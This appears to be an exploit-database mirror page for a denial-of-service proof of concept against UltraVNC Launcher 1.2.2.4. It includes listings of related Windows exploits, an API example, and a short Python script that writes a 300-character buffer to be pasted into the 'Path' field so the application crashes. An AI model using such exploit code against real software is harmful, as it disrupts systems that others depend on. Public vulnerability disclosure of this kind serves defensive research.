Menu

Improved exploit search engine. Try it out

"UltraVNC Launcher 1.2.2.4 - 'Path' Denial of Service (PoC)"

Author

"Victor Mondragón"

Platform

windows

Release date

2019-04-15

Release Date Title Type Platform Author
2019-04-19 "Oracle Business Intelligence / XML Publisher 11.1.1.9.0 / 12.2.1.3.0 / 12.2.1.4.0 - XML External Entity Injection" webapps windows "Vahagn Vardanyan"
2019-04-19 "Oracle Business Intelligence 11.1.1.9.0 / 12.2.1.3.0 / 12.2.1.4.0 - Directory Traversal" webapps windows "Vahagn Vardanyan"
2019-04-18 "ManageEngine Applications Manager 11.0 < 14.0 - SQL Injection / Remote Code Execution (Metasploit)" remote windows AkkuS
2019-04-17 "MailCarrier 2.51 - POP3 'RETR' SEH Buffer Overflow" remote windows "Dino Covotsos"
2019-04-17 "DHCP Server 2.5.2 - Denial of Service (PoC)" dos windows "Victor Mondragón"
2019-04-16 "Microsoft Windows 10 1809 - LUAFV PostLuafvPostReadWrite SECTION_OBJECT_POINTERS Race Condition Privilege Escalation" local windows "Google Security Research"
2019-04-16 "Microsoft Windows 10 1809 - LUAFV Delayed Virtualization Cache Manager Poisoning Privilege Escalation" local windows "Google Security Research"
2019-04-16 "Microsoft Windows 10 1809 - LUAFV NtSetCachedSigningLevel Device Guard Bypass" local windows "Google Security Research"
2019-04-16 "Microsoft Windows 10 1809 - LUAFV LuafvCopyShortName Arbitrary Short Name Privilege Escalation" local windows "Google Security Research"
2019-04-16 "Microsoft Windows 10 1809 - LUAFV Delayed Virtualization Cross Process Handle Duplication Privilege Escalation" local windows "Google Security Research"
2019-04-16 "Microsoft Windows 10 1809 - LUAFV Delayed Virtualization MAXIMUM_ACCESS DesiredAccess Privilege Escalation" local windows "Google Security Research"
2019-04-16 "Microsoft Windows 10 1809 / 1709 - CSRSS SxSSrv Cached Manifest Privilege Escalation" local windows "Google Security Research"
2019-04-16 "Zoho ManageEngine ADManager Plus 6.6 (Build < 6659) - Privilege Escalation" local windows "Digital Interruption"
2019-04-16 "AdminExpress 1.2.5 - 'Folder Path' Denial of Service (PoC)" dos windows "Mücahit İsmail Aktaş"
2019-04-16 "PCHelpWare V2 1.0.0.5 - 'Group' Denial of Service (PoC)" dos windows "Alejandra Sánchez"
2019-04-16 "PCHelpWare V2 1.0.0.5 - 'SC' Denial of Service (PoC)" dos windows "Alejandra Sánchez"
2019-04-15 "MailCarrier 2.51 - POP3 'TOP' SEH Buffer Overflow" remote windows "Dino Covotsos"
2019-04-15 "MailCarrier 2.51 - POP3 'LIST' SEH Buffer Overflow" remote windows "Dino Covotsos"
2019-04-15 "MailCarrier 2.51 - POP3 'USER' Buffer Overflow" remote windows "Dino Covotsos"
2019-04-15 "RemoteMouse 3.008 - Arbitrary Remote Command Execution" remote windows 0rphon
2019-04-15 "MailCarrier 2.51 - 'RCPT TO' Buffer Overflow" remote windows "Dino Covotsos"
2019-04-15 "UltraVNC Launcher 1.2.2.4 - 'Path' Denial of Service (PoC)" dos windows "Victor Mondragón"
2019-04-15 "UltraVNC Viewer 1.2.2.4 - 'VNC Server' Denial of Service (PoC)" dos windows "Victor Mondragón"
2019-04-12 "Microsoft Windows - Contact File Format Arbitary Code Execution (Metasploit)" local windows Metasploit
2019-04-12 "Microsoft Internet Explorer 11 - XML External Entity Injection" local windows hyp3rlinx
2019-04-12 "CyberArk EPM 10.2.1.603 - Security Restrictions Bypass" local windows "Alpcan Onaran"
2019-04-10 "FTPShell Server 6.83 - 'Virtual Path Mapping' Local Buffer" local windows "Dino Covotsos"
2019-04-10 "FTPShell Server 6.83 - 'Account name to ban' Local Buffer" local windows "Dino Covotsos"
2019-04-09 "Microsoft Windows - AppX Deployment Service Privilege Escalation" local windows "Nabeel Ahmed"
2019-04-08 "Download Accelerator Plus (DAP) 10.0.6.0 - SEH Buffer Overflow" local windows "Peyman Forouzan"
Release Date Title Type Platform Author
2019-04-17 "DHCP Server 2.5.2 - Denial of Service (PoC)" dos windows "Victor Mondragón"
2019-04-15 "UltraVNC Launcher 1.2.2.4 - 'Path' Denial of Service (PoC)" dos windows "Victor Mondragón"
2019-04-15 "UltraVNC Viewer 1.2.2.4 - 'VNC Server' Denial of Service (PoC)" dos windows "Victor Mondragón"
2019-02-20 "FTPShell Server 6.83 - 'Account name to ban' Denial of Service (PoC)" dos windows "Victor Mondragón"
2019-02-19 "BulletProof FTP Server 2019.0.0.50 - 'SMTP Server' Denial of Service (PoC)" dos windows "Victor Mondragón"
2019-02-19 "Valentina Studio 9.0.4 - 'Host' Denial of Service (PoC)" dos windows "Victor Mondragón"
2019-02-19 "NetSetMan 4.7.1 - 'Workgroup' Denial of Service (PoC)" dos windows "Victor Mondragón"
2019-02-15 "Navicat for Oracle 12.1.15 - _Password_ Denial of Service (PoC)" dos windows "Victor Mondragón"
2019-02-15 "Free IP Switcher 3.1 - 'Computer Name' Denial of Service (PoC)" dos windows "Victor Mondragón"
2019-02-14 "Core FTP/SFTP Server 1.2 Build 589.42 - 'User domain' Denial of Service (PoC)" dos windows "Victor Mondragón"
2019-02-05 "Device Monitoring Studio 8.10.00.8925 - Denial of Service (PoC)" dos windows "Victor Mondragón"
2018-11-12 "HeidiSQL 9.5.0.5196 - Denial of Service (PoC)" dos windows "Victor Mondragón"
2018-11-05 "Softros LAN Messenger 9.2 - Denial of Service (PoC)" dos windows_x86-64 "Victor Mondragón"
2018-11-01 "WebDrive 18.00.5057 - Denial of Service (PoC)" dos windows_x86-64 "Victor Mondragón"
2018-10-31 "SmartFTP Client 9.0.2615.0 - Denial of Service (PoC)" dos windows_x86-64 "Victor Mondragón"
2018-08-30 "NetworkActiv Web Server 4.0 Pre-Alpha-3.7.2 - 'Username' Denial of Service (PoC)" dos windows_x86-64 "Victor Mondragón"
import requests
response = requests.get('https://www.nmmapper.com/api/exploitdetails/46703/?format=json')
                                                {"url": "https://www.nmmapper.com/api/exploitdetails/46703/?format=json", "download_file": "https://www.nmmapper.com/st/exploitdetails/46703/41138/ultravnc-launcher-1224-path-denial-of-service-poc/download/", "exploit_id": "46703", "exploit_description": "\"UltraVNC Launcher 1.2.2.4 - 'Path' Denial of Service (PoC)\"", "exploit_date": "2019-04-15", "exploit_author": "\"Victor Mondrag\u00f3n\"", "exploit_type": "dos", "exploit_platform": "windows", "exploit_port": null}
                                            

For full documentation follow the link above

Browse exploit DB API Browse

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
#Exploit Title: UltraVNC Launcher 1.2.2.4 - Denial of Service (PoC)
#Discovery by: Victor Mondragón
#Discovery Date: 2019-04-14
#Vendor Homepage: https://www.uvnc.com/
#Software Link: https://www.uvnc.com/downloads/ultravnc/126-download-ultravnc-1224.html
#Tested Version: 1.2.2.4
#Tested on: Windows 7 x64 Service Pack 1

#Steps to produce the crash:
#1.- Run python code: UltraVNC_Launcher_1.2.2.4.py
#2.- Open UltraLauncher.txt and copy content to clipboard
#3.- Open UltraVNC Launcher
#4.- Select "Properties"
#5.- In "Path vncviewer.exe" Paste Clipboard
#6.- Click on "OK"
#7.- Crashed

cod = "\x41" * 300

f = open('UltraLauncher.txt', 'w')
f.write(cod)
f.close()